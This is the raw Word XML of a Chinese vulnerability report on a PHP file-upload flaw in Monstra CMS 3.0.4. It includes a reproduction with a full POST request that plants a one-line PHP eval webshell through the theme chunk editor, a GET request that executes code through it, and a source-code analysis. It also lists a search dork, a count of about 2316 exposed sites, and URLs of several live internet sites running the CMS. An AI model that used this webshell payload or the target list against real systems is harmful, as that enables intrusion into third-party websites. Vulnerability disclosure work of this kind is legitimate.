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  <w:bookmarkStart w:id="0" w:name="header-n2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>monstra cms在后台进行主题样式编辑时，可以对php文件在线编辑+上传漏洞，并且上传目录地址存在未授权访问。</w:t>
      </w:r>
    </w:p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宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>源码地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//github.com/monstra-cms/monstra/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源码归属：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>https://monstra.org/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hunter搜索web.body="monstra"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2316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互联网案例：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https://ridgewayscoaches.co.uk/home,https://mail.ridgewayscoaches.co.uk/,https://rileyandsarahmusic.com/home,https://demo.harmonyb2b.io/,https://52.58.6.138/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php文件上传——/monstra-3.0.4/admin/index.php?id=themes&amp;action=add_chunk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漏洞详情</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="宋体" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FAFAFA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Monstra CMS最先版本3.0.4存在php文件上传漏洞，攻击者可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/monstra-3.0.4/admin/index.php?id=themes&amp;action=add_chunk中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AFAFA"/>
        </w:rPr>
        <w:t>Name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AFAFA"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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AFAFA"/>
        </w:rPr>
        <w:t>Chunk content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333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FAFAFA"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行编辑写入一句话木马后存储为.php文件，而该php文件的地址存在未授权访问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漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Hlk163817245"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞环境搭建在本地。</w:t>
      </w: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先登录后台获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Cookie: PHPSESSID=7qnrr3ek7nm3hr4f8q49aab18l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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/monstra-3.0.4/admin/index.php?id=themes&amp;action=add_chunk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2955290"/>
            <wp:effectExtent l="0" t="0" r="7620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POST /monstra-3.0.4/monstra-3.0.4/admin/index.php?id=themes&amp;action=add_chunk HTTP/1.1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Host: debug:1211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Content-Length: 145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Cache-Control: max-age=0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Upgrade-Insecure-Requests: 1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Origin: http://debug:1211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Content-Type: application/x-www-form-urlencoded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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9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Referer: http://debug:1211/monstra-3.0.4/monstra-3.0.4/admin/index.php?id=themes&amp;action=add_chunk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Accept-Encoding: gzip, deflate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Accept-Language: zh-CN,zh;q=0.9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Cookie: PHPSESSID=7qnrr3ek7nm3hr4f8q49aab18l</w:t>
      </w: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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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csrf=413a7071559bed47bae7bec6bfd61328e0e10d13&amp;name=evil&amp;content=%3C%3Fphp+eval%28%24_GET%5B%27x%27%5D%29%3B%3F%3E&amp;add_file_and_exit=Save+and+Exit</w:t>
      </w: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上述POST请求数据包中，name=evil表示上传文件名的前缀为evil，content表示文件写入的内容，这里写入payload：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体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4"/>
        </w:rPr>
        <w:t>%3C%3Fphp+eval%28%24_GET%5B%27x%27%5D%29%3B%3F%3E</w:t>
      </w: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再访问：/monstra-3.0.4/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>public/themes/default/evil.chunk.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?x=phpinfo();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通过get方式传参x，执行phpinfo()命令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GET /monstra-3.0.4/monstra-3.0.4/public/themes/default/evil.chunk.php?x=phpinfo(); HTTP/1.1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Host: debug:1211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Cache-Control: max-age=0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Upgrade-Insecure-Requests: 1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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9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Accept-Encoding: gzip, deflate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Accept-Language: zh-CN,zh;q=0.9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Cookie: PHPSESSID=7qnrr3ek7nm3hr4f8q49aab18l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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="3202940"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270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59735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1206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75000"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1016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ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pP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下面是源码分析：</w:t>
      </w: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rPr>
          <w:rFonts w:hint="eastAsia"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24"/>
        </w:rPr>
        <w:t>monstra-3.0.4/plugins/box/themes/themes.admin.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="2637790"/>
            <wp:effectExtent l="0" t="0" r="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由上述数据包可以看出，get方法上传参数中action=add_chunk对应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>themes.admin.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第80行，开始php文件创建和内容写入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5257165" cy="2609850"/>
            <wp:effectExtent l="0" t="0" r="63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在第91行通过调用File类的setContent方法对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>php文件进行创建和内容写入；$chunk_path是文件创建后保存的地址，而其中name和content对应上面数据包所发送的内容。（可以发现创建的文件会在后面加上chunk.php后缀）</w:t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下面进入File.php文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>monstra-3.0.4/libraries/Gelato/FileSystem/File.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260340" cy="2062480"/>
            <wp:effectExtent l="0" t="0" r="1270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File类的setContent方法第310、311行，$filename表示文件的决定路径，$content表示文件内容，也就是上述paylaod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1972310"/>
            <wp:effectExtent l="0" t="0" r="1905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第319行创建evil.chunk.php文件，第322行用fopen()打开该文件，第334行写入一句话木马进入该文件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monstra-3.0.4/libraries/Gelato/FileSystem/Dir.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2026285"/>
            <wp:effectExtent l="0" t="0" r="6350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本地观察文件成功创建</w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:bookmarkEnd w:id="1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244215"/>
            <wp:effectExtent l="0" t="0" r="571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0A9D7A08"/>
    <w:rsid w:val="12CB2BD1"/>
    <w:rsid w:val="557E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87</Words>
  <Characters>450</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>23</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>537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2024-05-26T08:15:00Z</dcterms:created>
  <dc:creator>OoLs</dc:creator>
  <cp:lastModifiedBy>OoLs、</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-11T13:15:12Z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7736254143B34434BAC35D3AD83DF086_12</vt:lpwstr>
  </property>
</Properties>
</file>